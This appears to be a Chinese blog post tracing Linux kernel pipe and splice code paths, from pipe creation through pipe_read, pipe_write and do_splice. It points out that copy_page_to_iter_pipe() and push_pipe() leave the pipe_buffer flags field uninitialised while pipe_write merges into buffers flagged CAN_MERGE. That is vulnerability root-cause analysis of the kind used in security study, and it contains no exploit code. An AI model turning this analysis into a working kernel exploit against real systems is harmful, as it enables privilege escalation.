这调用链 麻了
众所周知 在Linux中 近乎所有东西都是以文件
的形式存在的 管道也不例外 在Linux内核中 管道本质上是创建了一个虚拟的inode结点 在节点上存放数据的是pipe_inode_info
结构体
当创建一个管道时 内核会创建一个VFS inode 一个pipe_inode_info
结构体 两个文件描述符(表示管道的两端) 一个pipe_buffer
结构体数组
对于文件之间的copy 最直接的方法就是直接打开两个文件 然后对着copy就好了 当然一般直接的方法都比较烂.. 这样做虽然简单 但是会带来大量的系统开销 因为需要频繁地将数据从用户态传递到内核态 然后再将数据从内核态传递到用户态 来回进行数据拷贝
因此为了减少这样的系统开销所以诞生了splice
其作用是在两个文件描述符之间进行copy 但是这个拷贝过程是不经过用户态的 其本质是利用管道在内核空间中进行数据拷贝
当数据想要从一个文件描述符拷贝到另一个文件描述符中时 只需要先创建一个管道 之后使用splice
将数据从源文件描述符拷贝到管道中 然后再调用splice
将数据从管道拷贝到目的文件描述符中即可 这样所有数据的拷贝都在内核空间完成
// include/linux/pipe_fs_i.h
/*
 * struct pipe_buffer holds the data that is actually stored in a pipe.
 * The defines below give the default number of buffers per pipe and the
 * bits that may be set in pipe_buffer.flags.
 */
// flags
#define PIPE_DEF_BUFFERS 16
#define PIPE_BUF_FLAG_LRU 0x01 /* page is on the LRU */
#define PIPE_BUF_FLAG_ATOMIC 0x02 /* was atomically mapped */
#define PIPE_BUF_FLAG_GIFT 0x04 /* page is a gift */
#define PIPE_BUF_FLAG_PACKET 0x08 /* read() as a packet */
#define PIPE_BUF_FLAG_CAN_MERGE 0x10 /* can merge buffers */
#define PIPE_BUF_FLAG_WHOLE 0x20 /* read() must return entire buffer or error */
#ifdef CONFIG_WATCH_QUEUE
#define PIPE_BUF_FLAG_LOSS 0x40 /* Message loss happened after this buffer */
#endif
/**
* struct pipe_buffer - a linux kernel pipe buffer
* @page: the page containing the data for the pipe buffer
* @offset: offset of data inside the @page
* @len: length of data inside the @page
* @ops: operations associated with this buffer. See @pipe_buf_operations.
* @flags: pipe buffer flags. See above.
* @private: private data owned by the ops.
**/
struct pipe_buffer {
struct page *page; // page backing this pipe_buffer
unsigned int offset, len; // offset and length of the data inside the page
const struct pipe_buf_operations *ops; // operations tied to this buffer (not covered in this article)
unsigned int flags; // PIPE_BUF_FLAG_* bits, see the defines above
unsigned long private; // private data owned by the associated ops
};
// include/linux/pipe_fs_i.h
/**
* struct pipe_inode_info - a linux kernel pipe
* @mutex: mutex protecting the whole thing
* @rd_wait: reader wait point in case of empty pipe
* @wr_wait: writer wait point in case of full pipe
* @head: The point of buffer production
* @tail: The point of buffer consumption
* @note_loss: The next read() should insert a data-lost message
* @max_usage: The maximum number of slots that may be used in the ring
* @ring_size: total number of buffers (should be a power of 2)
* @nr_accounted: The amount this pipe accounts for in user->pipe_bufs
* @tmp_page: cached released page
* @readers: number of current readers of this pipe
* @writers: number of current writers of this pipe
* @files: number of struct file referring this pipe (protected by ->i_lock)
* @r_counter: reader counter
* @w_counter: writer counter
* @fasync_readers: reader side fasync
* @fasync_writers: writer side fasync
* @bufs: the circular array of pipe buffers
* @user: the user who created this pipe
* @watch_queue: If this pipe is a watch_queue, this is the stuff for that
**/
struct pipe_inode_info {
struct mutex mutex; // mutex serialising access to the whole pipe
wait_queue_head_t rd_wait, wr_wait; // wait queues: readers blocked on an empty pipe, writers blocked on a full pipe (producer/consumer style)
unsigned int head; // producer index: where the next buffer is added
unsigned int tail; // consumer index: the next buffer to be read
unsigned int max_usage; // maximum number of ring slots that may be in use
unsigned int ring_size; // total number of pipe_buffer slots in the ring (should be a power of 2)
#ifdef CONFIG_WATCH_QUEUE
bool note_loss; // the next read() should insert a data-lost message
#endif
unsigned int nr_accounted; // amount this pipe accounts for in user->pipe_bufs
unsigned int readers; // number of current readers of this pipe
unsigned int writers; // number of current writers of this pipe
unsigned int files; // number of struct file objects referring to this pipe
unsigned int r_counter; // reader counter
unsigned int w_counter; // writer counter
struct page *tmp_page; // cached released page
struct fasync_struct *fasync_readers; // reader-side fasync
struct fasync_struct *fasync_writers; // writer-side fasync
struct pipe_buffer *bufs; // circular array of pipe_buffer slots
struct user_struct *user; // the user who created this pipe
#ifdef CONFIG_WATCH_QUEUE
struct watch_queue *watch_queue; // set when this pipe is a watch_queue
#endif
};
// include/linux/uio.h
/*
iov_iter结构体用于迭代被分为多个页的数据 -> 用于迭代一个个页面
*/
/*
 * Kinds of backing store an iov_iter can walk over. The value is kept in
 * iov_iter.type.
 */
enum iter_type {
/* iter types */
ITER_IOVEC = 4,
ITER_KVEC = 8,
ITER_BVEC = 16,
ITER_PIPE = 32, // the data being iterated lives in a pipe
ITER_DISCARD = 64, // everything written to this iov_iter is discarded
};
/*
 * Iterator over data that is split across several segments/pages.
 * The first union selects the backing store; for ITER_PIPE it is @pipe.
 * The second union carries either a segment count or, as an anonymous
 * struct, a pair of ring indices (head / start_head).
 */
struct iov_iter {
/*
* Bit 0 is the read/write bit, set if we're writing.
* Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and
* the caller isn't expecting to drop a page reference when done.
*/
unsigned int type; // which kind of structure the iterated data comes from (enum iter_type)
size_t iov_offset; // offset inside the current page/segment where the next read/write starts
size_t count; // number of bytes still available to read/write
union {
const struct iovec *iov;
const struct kvec *kvec;
const struct bio_vec *bvec;
struct pipe_inode_info *pipe;
};
union {
unsigned long nr_segs;
struct {
unsigned int head; // presumably the ring slot the iterator currently points at (pipe case) - confirm
unsigned int start_head;
};
};
};
创建管道使用的是pipe()系统调用 但是实际上在Kernel层面调用的是do_pipe2()
// fs/pipe.c
/*
 * Kernel-side implementation behind pipe(): create the pipe and hand the
 * two descriptor numbers back to user space.
 *
 * @fildes: user-space array that receives the two fds
 * @flags:  flags forwarded to __do_pipe_flags()
 *
 * Returns 0 on success, the error from __do_pipe_flags(), or -EFAULT when
 * the fds cannot be copied to @fildes.
 */
static int do_pipe2(int __user *fildes, int flags)
{
struct file *files[2];
int fd[2];
int error;
error = __do_pipe_flags(fd, files, flags);
if (!error) {
if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) {
/* Could not report the fds to user space: undo everything. */
fput(files[0]);
fput(files[1]);
put_unused_fd(fd[0]);
put_unused_fd(fd[1]);
error = -EFAULT;
} else {
/* Publish both ends: bind each fd number to its struct file. */
fd_install(fd[0], files[0]);
fd_install(fd[1], files[1]);
}
}
return error;
}
可以看到实际上调用的是__do_pipe_flags()
/*
 * Validate @flags, create the two pipe files and start reserving file
 * descriptors for them. The rest of the function is elided ("...") in the
 * article.
 *
 * NOTE(review): the "c" fused onto "static" below looks like a code-fence
 * language tag left over from extraction - confirm and remove.
 */
cstatic int __do_pipe_flags(int *fd, struct file **files, int flags)
{
int error;
int fdw, fdr;
/* Reject any flag outside the supported set. */
if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE))
return -EINVAL;
error = create_pipe_files(files, flags);
if (error)
return error;
error = get_unused_fd_flags(flags);
...
}
/*
 * Create the struct file objects for a new pipe. Only the beginning is
 * quoted: it obtains the pipe inode and fails with -ENFILE when none could
 * be allocated.
 *
 * NOTE(review): the "c" fused onto "int" below looks like a code-fence
 * language tag left over from extraction - confirm and remove.
 */
cint create_pipe_files(struct file **res, int flags)
{
struct inode *inode = get_pipe_inode();
struct file *f;
int error;
if (!inode)
return -ENFILE;
...
}
/*
 * Allocate the pseudo inode that represents a pipe and attach a freshly
 * allocated pipe_inode_info to it. Only the allocation steps are quoted;
 * the rest, including the fail_* labels, is elided.
 *
 * NOTE(review): the "c" fused onto "static" below looks like a code-fence
 * language tag left over from extraction - confirm and remove.
 */
cstatic struct inode * get_pipe_inode(void)
{
struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb);
struct pipe_inode_info *pipe;
if (!inode)
goto fail_inode;
inode->i_ino = get_next_ino();
pipe = alloc_pipe_info();
if (!pipe)
goto fail_iput;
...
}
/*
 * Allocate and initialise a pipe_inode_info together with its array of
 * pipe_buffer slots. Parts of the function are elided ("...").
 *
 * In the quoted code both allocations are zero-filling (kzalloc/kcalloc)
 * and the ring starts with PIPE_DEF_BUFFERS slots.
 *
 * NOTE(review): the "c" fused onto "struct" below looks like a code-fence
 * language tag left over from extraction - confirm and remove.
 */
cstruct pipe_inode_info *alloc_pipe_info(void)
{
struct pipe_inode_info *pipe;
unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
struct user_struct *user = get_current_user();
unsigned long user_bufs;
unsigned int max_size = READ_ONCE(pipe_max_size);
pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
if (pipe == NULL)
goto out_free_uid;
...
/* One pipe_buffer per ring slot. */
pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
GFP_KERNEL_ACCOUNT);
if (pipe->bufs) {
init_waitqueue_head(&pipe->rd_wait);
init_waitqueue_head(&pipe->wr_wait);
pipe->r_counter = pipe->w_counter = 1;
pipe->max_usage = pipe_bufs;
pipe->ring_size = pipe_bufs;
pipe->nr_accounted = pipe_bufs;
pipe->user = user;
mutex_init(&pipe->mutex);
return pipe;
}
...
}
可以看到最后先调用了kzalloc()
分配了一个pipe_inode_info
结构体 然后调用`kcalloc()`分配了
`PIPE_DEF_BUFFERS`(16)个
`pipe_buffer` 然后挂载到
`pipe_inode_info->bufs`上
至此 pipe的创建流程已经走完 调用链为pipe() -> do_pipe2() -> __do_pipe_flags() -> create_pipe_files() -> get_pipe_inode() -> alloc_pipe_info()
在同文件中有一个file_operations
函数表 可以看到对于pipe的读操作是调用pipe_read()
实现的
/*
 * file_operations table for pipes/FIFOs. Reads are routed to pipe_read()
 * through .read_iter and writes to pipe_write() through .write_iter.
 *
 * NOTE(review): the "c" fused onto "const" below looks like a code-fence
 * language tag left over from extraction - confirm and remove.
 */
cconst struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};
相关函数定义为
// fs/pipe.c
static ssize_t pipe_read(struct kiocb *iocb, struct iov_iter *to)
其中两个参数
首先是调用iov_iter_count(to)
来获取读取的字节数 并且从iocb
中获取到pipe_inode_info
结构体 如果读取的字节数为0 则直接退出
csize_t total_len = iov_iter_count(to);
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
bool was_full, wake_next_reader = false;
ssize_t ret;
/* Null read succeeds. */
if (unlikely(total_len == 0))
return 0;
ret = 0;
__pipe_lock(pipe);
然后判断管道是否已满 如果pipe->head - pipe->tail >= pipe->max_usage
则管道已满
cwas_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
接下来就是循环读 将pipe中的内容读到`to`所描述的目标缓冲区中
cfor (;;) {
unsigned int head = pipe->head;
unsigned int tail = pipe->tail;
unsigned int mask = pipe->ring_size - 1;
if (!pipe_empty(head, tail)) {
struct pipe_buffer *buf = &pipe->bufs[tail & mask];
size_t chars = buf->len;
size_t written;
int error;
if (chars > total_len) {
if (buf->flags & PIPE_BUF_FLAG_WHOLE) {
if (ret == 0)
ret = -ENOBUFS;
break;
}
chars = total_len;
}
error = pipe_buf_confirm(pipe, buf);
if (error) {
if (!ret)
ret = error;
break;
}
written = copy_page_to_iter(buf->page, buf->offset, chars, to);
if (unlikely(written < chars)) {
if (!ret)
ret = -EFAULT;
break;
}
ret += chars;
buf->offset += chars;
buf->len -= chars;
/* Was it a packet buffer? Clean up and exit */
if (buf->flags & PIPE_BUF_FLAG_PACKET) {
total_len = chars;
buf->len = 0;
}
if (!buf->len) {
pipe_buf_release(pipe, buf);
spin_lock_irq(&pipe->rd_wait.lock);
tail++;
pipe->tail = tail;
spin_unlock_irq(&pipe->rd_wait.lock);
}
total_len -= chars;
if (!total_len)
break; /* common path: read succeeded */
if (!pipe_empty(head, tail)) /* More to do? */
continue;
}
if (!pipe->writers)
break;
if (ret)
break;
if (filp->f_flags & O_NONBLOCK) {
ret = -EAGAIN;
break;
}
__pipe_unlock(pipe);
/*
* We only get here if we didn't actually read anything.
*
* However, we could have seen (and removed) a zero-sized
* pipe buffer, and might have made space in the buffers
* that way.
*
* You can't make zero-sized pipe buffers by doing an empty
* write (not even in packet mode), but they can happen if
* the writer gets an EFAULT when trying to fill a buffer
* that already got allocated and inserted in the buffer
* array.
*
* So we still need to wake up any pending writers in the
* _very_ unlikely case that the pipe was full, but we got
* no data.
*/
if (unlikely(was_full)) {
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}
/*
* But because we didn't read anything, at this point we can
* just return directly with -ERESTARTSYS if we're interrupted,
* since we've done any required wakeups and there's no need
* to mark anything accessed. And we've dropped the lock.
*/
if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0)
return -ERESTARTSYS;
__pipe_lock(pipe);
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);
wake_next_reader = true;
}
最后做一些判断 然后返回读入字节数
cif (was_full) {
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT);
}
if (wake_next_reader)
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
if (ret > 0)
file_accessed(filp);
return ret;
还是先来看下函数定义
// lib/iov_iter.c
size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes, struct iov_iter *i)
整体函数实现非常短 根据不同的iov_iter类型 执行不同的copy方式 这里我们主要关注的是pipe的copy方式
c if (unlikely(!page_copy_sane(page, offset, bytes)))
return 0;
if (i->type & (ITER_BVEC|ITER_KVEC)) {
void *kaddr = kmap_atomic(page);
size_t wanted = copy_to_iter(kaddr + offset, bytes, i);
kunmap_atomic(kaddr);
return wanted;
} else if (unlikely(iov_iter_is_discard(i)))
return bytes;
else if (likely(!iov_iter_is_pipe(i)))
return copy_page_to_iter_iovec(page, offset, bytes, i);
else
return copy_page_to_iter_pipe(page, offset, bytes, i);
整体实现也很短而且好理解
/*
 * "Copy" @bytes bytes at @offset of @page into a pipe-backed iov_iter.
 * No data is moved: the pipe slot is simply pointed at @page, with an
 * extra page reference taken.
 *
 * Returns the number of bytes accounted for, or 0 when nothing could be
 * added (zero length, failed sanity check, or pipe full).
 *
 * Every field of the slot that is assigned here (ops, page, offset, len)
 * gets a fresh value, but buf->flags is never written in this function, so
 * the slot keeps whatever flags it had before.
 *
 * NOTE(review): the "c" fused onto "static" below looks like a code-fence
 * language tag left over from extraction - confirm and remove.
 */
cstatic size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe; // the pipe behind this iterator
struct pipe_buffer *buf;
// snapshot the ring state needed below
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;
if (unlikely(bytes > i->count)) // clamp to what the iterator still has room for
bytes = i->count;
if (unlikely(!bytes))
return 0;
if (!sanity(i))
return 0;
off = i->iov_offset; // offset at which the iterator would write next
buf = &pipe->bufs[i_head & p_mask]; // slot the iterator currently points at
if (off) {
if (offset == off && buf->page == page) { // same page, and the new data starts exactly where the iterator left off
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
/* Cannot extend the current slot: move on to the next one. */
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage)) // no free slot: nothing copied
return 0;
buf->ops = &page_cache_pipe_buf_ops;
get_page(page); // take a reference on the page
buf->page = page; // reference the page directly instead of copying its contents
buf->offset = offset;
buf->len = bytes;
pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}
很显然 对于接收方来说 复制就是直接引用
需要复制的页面 并且记录页面的offset len等数据 这样做的好处是降低了性能开销 毕竟io是需要时间的 但是赋值近乎不需要
当然因为这里接收方是直接引用的其他页面 所以必须保证在写入的时候不会将数据写入到这种页面中 另外我们可以发现在page复制到pipe_buffer
中时 几乎所有的pipe相关的数据都被重新赋值了 除了flags
对于pipe的数据传递 除了pipe_read() -> copy_page_to_iter() -> copy_page_to_iter_pipe()
的调用链之外 copy_to_iter()
也可以实现类似的功能
// include/linux/uio.h
/*
 * Size-checked front end for _copy_to_iter(): returns 0 when
 * check_copy_size() rejects the request, otherwise whatever
 * _copy_to_iter() returns.
 */
size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
if (unlikely(!check_copy_size(addr, bytes, true)))
return 0;
else
return _copy_to_iter(addr, bytes, i);
}
// lib/iov_iter.c
/*
 * Copy @bytes bytes starting at @addr into the destination described by @i.
 *
 * addr:  source address
 * bytes: number of bytes to copy
 * i:     destination iov_iter
 *
 * Pipe-backed iterators are handed to copy_pipe_to_iter(). For everything
 * else, three copy expressions are passed to iterate_and_advance();
 * presumably they serve the iovec, bvec and kvec cases respectively
 * (the macro is not shown here - confirm).
 */
size_t _copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i)
{
const char *from = addr;
if (unlikely(iov_iter_is_pipe(i)))
return copy_pipe_to_iter(addr, bytes, i);
if (iter_is_iovec(i))
might_fault();
/* Each expression advances 'from' by the segment length it consumed. */
iterate_and_advance(i, bytes, v,
copyout(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len),
memcpy_to_page(v.bv_page, v.bv_offset,
(from += v.bv_len) - v.bv_len, v.bv_len),
memcpy(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len)
)
return bytes;
}
当然 可以发现最后针对pipe类型还是调用的copy_pipe_to_iter()
所以针对pipe的数据传递还有一条调用链为copy_to_iter() -> _copy_to_iter() -> copy_pipe_to_iter()
// lib/iov_iter.c
/*
 * Copy @bytes bytes from the buffer at @addr into a pipe-backed iov_iter.
 * Unlike copy_page_to_iter_pipe(), this one really copies: push_pipe()
 * reserves pipe slots, then the data is memcpy'd into their pages one
 * chunk at a time.
 *
 * Returns the number of bytes copied, which may be fewer than requested;
 * 0 when the sanity check fails or no space could be reserved.
 */
static size_t copy_pipe_to_iter(const void *addr, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe; // the pipe behind this iterator
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head;
size_t n, off;
if (!sanity(i))
return 0;
// reserve room in the pipe; i_head/off receive the starting slot and offset
bytes = n = push_pipe(i, bytes, &i_head, &off);
if (unlikely(!n))
return 0;
do {
/* At most up to the end of the current page per iteration. */
size_t chunk = min_t(size_t, n, PAGE_SIZE - off);
memcpy_to_page(pipe->bufs[i_head & p_mask].page, off, addr, chunk); // plain copy into the slot's page
i->head = i_head;
i->iov_offset = off + chunk;
n -= chunk;
addr += chunk;
off = 0;
i_head++;
} while (n);
i->count -= bytes; // shrink what the iterator still has left to fill
return bytes;
}
// lib/iov_iter.c
/*
 * Reserve room for up to @size bytes in the pipe behind @i, allocating new
 * pages for additional slots as needed.
 *
 * @iter_headp: receives the ring slot where the caller should start writing
 * @offp:       receives the offset inside that slot's page
 *
 * Returns the number of bytes of space actually reserved. This may be less
 * than @size when the pipe fills up or a page allocation fails.
 *
 * Newly filled slots get ops, page, offset and len assigned; buf->flags is
 * not written in this function.
 */
static size_t push_pipe(struct iov_iter *i, size_t size,
int *iter_headp, size_t *offp)
{
struct pipe_inode_info *pipe = i->pipe; // the pipe behind this iterator
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int iter_head;
size_t off;
ssize_t left;
// clamp the request to what the iterator has left; nothing to do for 0
if (unlikely(size > i->count))
size = i->count;
if (unlikely(!size))
return 0;
left = size;
data_start(i, &iter_head, &off); // starting slot and starting offset for the write
*iter_headp = iter_head;
*offp = off;
// the write starts in the middle of a page
if (off) {
left -= PAGE_SIZE - off; // subtract the room left in this page
if (left <= 0) {
pipe->bufs[iter_head & p_mask].len += size; // everything fits in the current page: done
return size;
}
pipe->bufs[iter_head & p_mask].len = PAGE_SIZE; // does not fit: this slot is used up to the page end
iter_head++;
}
// add fresh slots until the request is covered or the pipe is full
while (!pipe_full(iter_head, p_tail, pipe->max_usage)) {
struct pipe_buffer *buf = &pipe->bufs[iter_head & p_mask]; // next free slot
struct page *page = alloc_page(GFP_USER);
if (!page)
break;
// initialise the slot (flags is left untouched)
buf->ops = &default_pipe_buf_ops;
buf->page = page;
buf->offset = 0;
buf->len = min_t(ssize_t, left, PAGE_SIZE);
left -= buf->len;
iter_head++;
pipe->head = iter_head;
if (left == 0)
return size;
}
/* Ran out of slots or pages: report the part that was reserved. */
return size - left;
}
注意 此处当Kernel循环扩充pipe_buffer时跟copy_page_to_iter_pipe()
一样 漏掉了pipe_buffer
的flags
字段
根据pipefifo_fops
得知 对于管道的写操作是调用pipe_write
实现的
/*
 * file_operations table for pipes/FIFOs (quoted a second time): writes go
 * to pipe_write() through .write_iter.
 *
 * NOTE(review): the "c" fused onto "const" below looks like a code-fence
 * language tag left over from extraction - confirm and remove.
 */
cconst struct file_operations pipefifo_fops = {
.open = fifo_open,
.llseek = no_llseek,
.read_iter = pipe_read,
.write_iter = pipe_write,
.poll = pipe_poll,
.unlocked_ioctl = pipe_ioctl,
.release = pipe_release,
.fasync = pipe_fasync,
.splice_write = iter_file_splice_write,
};
// fs/pipe.c
/*
 * write_iter handler for pipes: copy the data described by @from into the
 * pipe reached through @iocb.
 *
 * Two phases:
 *  1. If the pipe is not empty and the write length is not a multiple of
 *     PAGE_SIZE, try to append the sub-page remainder to the most recently
 *     filled slot. This is allowed only when that slot has
 *     PIPE_BUF_FLAG_CAN_MERGE set and the data still fits in its page.
 *  2. Put the remaining data into fresh slots, one page at a time, sleeping
 *     when the pipe is full (unless O_NONBLOCK or a signal is pending).
 *
 * Returns the number of bytes written, or a negative errno (-EPIPE,
 * -EXDEV, -EFAULT, -ENOMEM, -EAGAIN, -ERESTARTSYS, or an error from
 * pipe_buf_confirm()/file_update_time()).
 */
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
struct file *filp = iocb->ki_filp;
struct pipe_inode_info *pipe = filp->private_data;
unsigned int head;
ssize_t ret = 0;
size_t total_len = iov_iter_count(from);
ssize_t chars;
bool was_empty = false;
bool wake_next_writer = false;
/* Null write succeeds. */
if (unlikely(total_len == 0))
return 0;
__pipe_lock(pipe);
// no readers on the pipe: raise SIGPIPE and fail
if (!pipe->readers) {
send_sig(SIGPIPE, current, 0);
ret = -EPIPE;
goto out;
}
#ifdef CONFIG_WATCH_QUEUE
if (pipe->watch_queue) {
ret = -EXDEV;
goto out;
}
#endif
/*
* Only wake up readers if the pipe started out empty, since otherwise
* there should be no readers waiting.
* If it was not empty we try to merge the new data into the last buffer.
* That naturally merges small writes, and it also page-aligns the rest
* of a large write that spans several pages.
*
* In short: prefer the last, partially filled page; open a new page
* only when appending to it is not allowed.
*/
head = pipe->head; // current producer index
was_empty = pipe_empty(head, pipe->tail);
chars = total_len & (PAGE_SIZE-1);
// there is a sub-page remainder and the pipe already holds data
if (chars && !was_empty) {
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask]; // the most recently filled slot
int offset = buf->offset + buf->len;
// append in place only if that slot is flagged CAN_MERGE and the data fits within its page
if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
offset + chars <= PAGE_SIZE) {
ret = pipe_buf_confirm(pipe, buf);
if (ret)
goto out;
ret = copy_page_from_iter(buf->page, offset, chars, from);
if (unlikely(ret < chars)) {
ret = -EFAULT;
goto out;
}
buf->len += ret;
if (!iov_iter_count(from))
goto out;
}
}
// write whatever is left into new slots
for (;;) {
if (!pipe->readers) { // readers went away: SIGPIPE and stop
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}
head = pipe->head;
if (!pipe_full(head, pipe->tail, pipe->max_usage)) { // there is a free slot: normal write path
unsigned int mask = pipe->ring_size - 1;
struct pipe_buffer *buf = &pipe->bufs[head & mask];
struct page *page = pipe->tmp_page;
int copied;
if (!page) { // no cached tmp_page: allocate one
page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
if (unlikely(!page)) {
ret = ret ? : -ENOMEM;
break;
}
pipe->tmp_page = page;
}
/*
* Allocate a slot in the ring in advance and attach an empty
* buffer. If we fault or otherwise fail to use it, the empty
* slot is left for the reader to deal with.
*/
spin_lock_irq(&pipe->rd_wait.lock);
head = pipe->head;
if (pipe_full(head, pipe->tail, pipe->max_usage)) { // pipe filled up in the meantime: retry the loop
spin_unlock_irq(&pipe->rd_wait.lock);
continue;
}
pipe->head = head + 1;
spin_unlock_irq(&pipe->rd_wait.lock);
/* Insert it into the buffer array */
buf = &pipe->bufs[head & mask];
buf->page = page;
buf->ops = &anon_pipe_buf_ops;
buf->offset = 0;
buf->len = 0;
// choose the slot's flags: PACKET for packetized pipes, CAN_MERGE otherwise
// (per the article, is_packetized() reflects O_DIRECT on the file - helper not shown here)
if (is_packetized(filp))
buf->flags = PIPE_BUF_FLAG_PACKET;
else
buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
pipe->tmp_page = NULL;
copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); // copy up to one page of data into the slot's page
if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
/* Short copy although data remains: treat as a fault. */
if (!ret)
ret = -EFAULT;
break;
}
ret += copied;
buf->offset = 0;
buf->len = copied;
if (!iov_iter_count(from)) // all data consumed: done
break;
}
if (!pipe_full(head, pipe->tail, pipe->max_usage))
continue;
// pipe is full: wait for buffer space unless we must not block
if (filp->f_flags & O_NONBLOCK) {
if (!ret)
ret = -EAGAIN;
break;
}
if (signal_pending(current)) {
if (!ret)
ret = -ERESTARTSYS;
break;
}
// drop the pipe lock, wake readers if the pipe had been empty, then sleep until writable
__pipe_unlock(pipe);
if (was_empty) {
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
}
wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
__pipe_lock(pipe);
was_empty = pipe_empty(pipe->head, pipe->tail);
wake_next_writer = true;
}
out:
/* No point waking another writer if the pipe is full again. */
if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
wake_next_writer = false;
__pipe_unlock(pipe);
if (was_empty) {
wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
}
if (wake_next_writer)
wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
/* After a successful write, update the file times (best effort: trylock). */
if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
int err = file_update_time(filp);
if (err)
ret = err;
sb_end_write(file_inode(filp)->i_sb);
}
return ret;
}
跟pipe()
差不多 虽然在常规状态下调用splice使用的是splice()
系统调用 但是其背后实现是内核中的do_splice()
c#include <fcntl.h>
ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);
这里会进行分辨 是pipe2pipe拷贝
pipe2file拷贝
还是file2pipe拷贝
或者是file2file拷贝
然后流入不同的函数 这里我们重点关注file2pipe
// fs/splice.c
/*
 * Kernel-side implementation behind splice(): work out which ends are
 * pipes and dispatch accordingly. The pipe-to-pipe and pipe-to-file
 * branches are partly elided ("..."); the file-to-pipe branch is quoted
 * in full.
 *
 * Returns the result of the selected helper, -EBADF when @in is not
 * readable or @out is not writable, -ESPIPE/-EINVAL for bad offsets, and
 * -EINVAL when neither end is a pipe.
 */
long do_splice(struct file *in, loff_t *off_in, struct file *out,
loff_t *off_out, size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;
// access-mode check: input must be readable, output writable
if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;
// look up the pipe_inode_info behind each file (a false/NULL result means "not a pipe" in the tests below)
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);
if (ipipe && opipe) { // pipe to pipe
...
return splice_pipe_to_pipe(ipipe, opipe, len, flags);
}
if (ipipe) { // pipe to file
...
ret = do_splice_from(ipipe, out, &offset, len, flags);
...
return ret;
}
if (opipe) { // file to pipe
// validate the offsets: a pipe takes no offset; an explicit input offset needs FMODE_PREAD
if (off_out)
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))
return -EINVAL;
offset = *off_in;
} else {
offset = in->f_pos;
}
if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;
pipe_lock(opipe);
// wait until the pipe has a free slot
ret = wait_for_space(opipe, flags);
if (!ret) {
unsigned int p_space;
// cap the transfer at the free space in the pipe (free slots * page size)
/* Don't try to read more the pipe has space for. */
p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);
len = min_t(size_t, len, p_space << PAGE_SHIFT);
// hand over to the file's splice_read via do_splice_to()
ret = do_splice_to(in, &offset, opipe, len, flags);
}
pipe_unlock(opipe);
if (ret > 0)
wakeup_pipe_readers(opipe);
/* Store the advanced offset back where it came from. */
if (!off_in)
in->f_pos = offset;
else
*off_in = offset;
return ret;
}
return -EINVAL;
}
整体流程还是比较短 其实大部分都是在做数据校验 然后根据文件类型调用对应文件类型的函数调用表中的splice_read()
